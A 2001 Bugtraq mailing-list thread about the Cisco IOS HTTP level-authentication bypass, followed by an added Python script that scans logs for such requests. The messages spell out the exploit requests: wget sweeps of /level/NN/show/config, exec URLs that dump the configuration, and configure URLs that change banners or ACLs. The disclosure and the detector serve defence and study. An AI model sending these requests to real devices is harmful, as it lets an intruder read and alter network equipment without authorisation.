[21326] in bugtraq


Re: Cisco device HTTP exploit...

daemon@ATHENA.MIT.EDU (Marc-Adrian Napoli)
Tue Jul 3 15:17:27 2001

Message-ID: <041e01c1038d$76822fc0$94db3fcb@cia.com.au>
From: "Marc-Adrian Napoli" <marcadrian@cia.com.au>
To: "Half Adder" <dps@Lib-Vai.lib.asu.edu>, <bugtraq@securityfocus.com>
Date: Tue, 3 Jul 2001 16:57:45 +1000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi,

I can't seem to recreate this exploit on any of my 1900/2900/2500/2600's?

ip http server
ip http authentication local

I have a little /bin/sh that does the following:

wget http://10.10.10.10/level/16/show/config
.
.
wget http://10.10.10.10/level/99/show/config


I get auth failed on all of them! Anyone?

Regards,

Marc-Adrian Napoli
Network Administrator
Connect infobahn Australia
+61 2 92120387


> You can also run configuration commands. :)
> 
> http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.
> 
> Start with http://169.254.0.16/level/xx/configure  and go from there.
> 
> A malicious user could use:
> 
> http://169.254.0.15/level/42/exec/show%20conf
> 
> to get, for instance, vty 0 4 acl information and then add an ACL for
> his/her source ip. 
> 
> I tested creating a banner.  I assume other configure commands will work
> as well.  This was tested on a Cisco switch.  Anyone?
> 
> 
> 
> 
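
An added example, not part of either message above: a defender-side scan of HTTP request logs for the `/level/NN/...` paths discussed in this thread, flagging per-source level sweeps and any request the device actually served. The log layout (common-log style from a hypothetical proxy or sensor in front of the management interface), the use of status 401 for "auth failed" and 200 for "served", the threshold, and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Path shapes quoted in this thread: /level/<NN>/show|exec|configure/...
# Any numeric level is matched, not only the 16-99 range the post tries.
LEVEL_RE = re.compile(r"^/level/(\d{1,3})/(show|exec|configure)(?:/(.*))?$")
# Assumed log layout: src ... "METHOD path HTTP/x" status ...
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return a finding dict for a /level/NN/ request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, raw_path, status = m.group(1), m.group(2), int(m.group(3))
    path = unquote(raw_path.split("?", 1)[0])  # decode %20 before matching
    lm = LEVEL_RE.match(path)
    if not lm:
        return None
    level, mode, rest = int(lm.group(1)), lm.group(2), lm.group(3) or ""
    return {"src": src, "level": level, "mode": mode,
            "command": rest.replace("/", " ").strip(),
            "served": status == 200, "writes_config": mode == "configure"}

def sweeps(findings, min_levels=5):
    """Sources that tried many distinct levels, like the wget list in the post."""
    seen = {}
    for f in findings:
        seen.setdefault(f["src"], set()).add(f["level"])
    return {s: sorted(lv) for s, lv in seen.items() if len(lv) >= min_levels}

# Constructed sample lines (not from the thread); addresses are documentation IPs.
SAMPLE_LOG = [
    f'192.0.2.7 - - [03/Jul/2001:16:57:45 +1000] "GET /level/{n}/show/config HTTP/1.0" 401 0'
    for n in range(16, 22)
] + [
    '192.0.2.9 - - [03/Jul/2001:17:02:10 +1000] "GET /level/42/exec/show%20conf HTTP/1.0" 200 5120',
    '192.0.2.9 - - [03/Jul/2001:17:03:31 +1000] "GET /level/42/configure/-/banner/motd/LINE HTTP/1.0" 200 310',
    '192.0.2.3 - - [03/Jul/2001:17:05:00 +1000] "GET /index.html HTTP/1.0" 200 900',
]

def scan(lines):
    """Return (all /level/ findings, per-source level sweeps)."""
    findings = [f for f in map(classify, lines) if f]
    return findings, sweeps(findings)

if __name__ == "__main__":
    hits, swept = scan(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("sweeps:", swept)
```

A finding with `served` true deserves attention first, and one with `writes_config` true means the running configuration should be compared against a known-good copy.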

